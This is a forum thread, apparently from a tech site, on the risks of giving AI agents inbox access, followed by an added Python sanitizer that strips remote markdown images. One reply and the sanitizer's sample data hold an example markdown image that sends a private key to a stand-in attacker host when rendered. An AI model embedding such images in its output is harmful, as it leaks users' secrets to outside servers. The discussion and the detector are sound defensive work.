Comment by mr_mitm

2 days ago

If this takes off, I wonder if platforms will start providing API tokens scoped for assistants. They have permissions for non-destructive actions like reading mail, flagging important mail, creating drafts, moving to trash, but not more.

How does my email platform know which messages I want my agent to see and which are too sensitive?

I don't see how it's possible to securely give an agent access to your inbox unless it has zero ability to exfiltrate (not sending mail, not making any external network requests). Even then, you need to be careful with artifacts generated by the agent because a markdown file could transmit data when rendered.

  • > a markdown file could transmit data when rendered.

    This is a new threat vector to me. Can you tell me more?

    • Your markdown file has an image that links to another server controlled by the attacker, and the path/query parameters you're attempting to render contain sensitive data.

          ![](https://the-attacker.com/steal?private-key=abc123def)
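One defensive check for the rendering-time exfiltration path described in the reply above, as an added example that is not part of the thread: a small scanner/sanitizer that finds inline markdown images in an agent-generated file and blocks any that would fetch from a host outside an allowlist. The allowlisted host `cdn.example.internal` and the sample document are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Inline markdown image syntax: ![alt](url "optional title")
# Reference-style images (![alt][ref]) and raw <img> tags are not covered here.
IMAGE_RE = re.compile(r'!\[[^\]]*\]\(\s*<?([^\s)>]+)>?(?:\s+"[^"]*")?\s*\)')

# Hosts the renderer may fetch images from (constructed allowlist for the example).
ALLOWED_HOSTS = {"cdn.example.internal"}

# Constructed sample of an agent-written summary that embeds a leaking image.
SAMPLE = """# Inbox summary
Nothing urgent today.
![](https://the-attacker.com/steal?private-key=abc123def)
![logo](https://cdn.example.internal/logo.png)
![inline](data:image/png;base64,iVBORw0KGgo=)
"""

def find_image_urls(markdown):
    """Return every inline image URL found in the markdown text."""
    return IMAGE_RE.findall(markdown)

def classify_image_url(url, allowed_hosts=ALLOWED_HOSTS):
    """Return (verdict, reason) for one image URL: 'ok', 'warn' or 'block'."""
    parsed = urlparse(url)
    # Relative paths and data: URIs cause no outbound request when rendered.
    if parsed.scheme in ("", "data"):
        return ("ok", "no remote fetch")
    host = (parsed.hostname or "").lower()
    if host not in allowed_hosts:
        # Any non-allowlisted host can observe the full URL, data in it or not.
        return ("block", f"remote image host {host} is not allowlisted")
    if parsed.query:
        # Even a trusted host should not receive data smuggled in a query string.
        return ("warn", "allowlisted host but URL carries a query string")
    return ("ok", "allowlisted host")

def sanitize_markdown(markdown, allowed_hosts=ALLOWED_HOSTS):
    """Replace blocked images with a visible placeholder; return (clean_text, findings)."""
    findings = []
    def repl(match):
        url = match.group(1)
        verdict, reason = classify_image_url(url, allowed_hosts)
        if verdict == "block":
            findings.append((url, reason))
            return "[blocked remote image]"
        return match.group(0)
    return IMAGE_RE.sub(repl, markdown), findings

if __name__ == "__main__":
    clean, found = sanitize_markdown(SAMPLE)
    for url, reason in found:
        print(f"BLOCKED {url}: {reason}")
    print(clean)
```

Running this over an artifact before it reaches a viewer removes the outbound fetch entirely; the same allowlist logic belongs in the renderer's image loader, since a sanitizer that only looks at one syntax will miss other forms.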